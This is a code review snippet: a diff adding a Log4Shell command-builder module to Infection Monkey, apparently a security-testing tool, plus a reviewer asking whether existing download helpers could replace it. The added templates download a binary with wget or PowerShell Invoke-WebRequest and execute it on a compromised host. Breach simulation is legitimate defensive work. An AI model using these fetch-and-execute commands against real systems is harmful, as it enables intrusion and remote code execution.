monkey/agent_plugins/exploiters/log4shell/src/log4shell_command_builder.py

```diff
@@ -0,0 +1,51 @@
+from typing import Sequence
+
+from common import OperatingSystem
+from common.common_consts import AGENT_OTP_ENVIRONMENT_VARIABLE
+from common.types import AgentID
+from infection_monkey.exploit.tools.helpers import get_agent_dst_path
+from infection_monkey.i_puppet import TargetHost
+from infection_monkey.model import DROPPER_ARG
+from infection_monkey.utils.commands import build_monkey_commandline
+
+LOG4SHELL_LINUX_COMMAND = (
+    "wget -O %(monkey_path)s %(http_path)s ;"
+    "chmod +x %(monkey_path)s ;"
+    " %(agent_otp_environment_variable)s=%(agent_otp)s "
+    " %(monkey_path)s %(monkey_type)s %(parameters)s"
+)
+
+LOG4SHELL_WINDOWS_COMMAND = (
+    'powershell -NoLogo -Command "'
+    "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing; "
+    "$env:%(agent_otp_environment_variable)s='%(agent_otp)s' ; "
+    '%(monkey_path)s %(monkey_type)s %(parameters)s"'
+)
```

Comment:
Do these commands do anything that the functions in `infection_monkey.utils.commands.py` don't do? Can we just use `build_down_load_command_linux_wget()` and `download_command_windows_powershell_webrequest()"?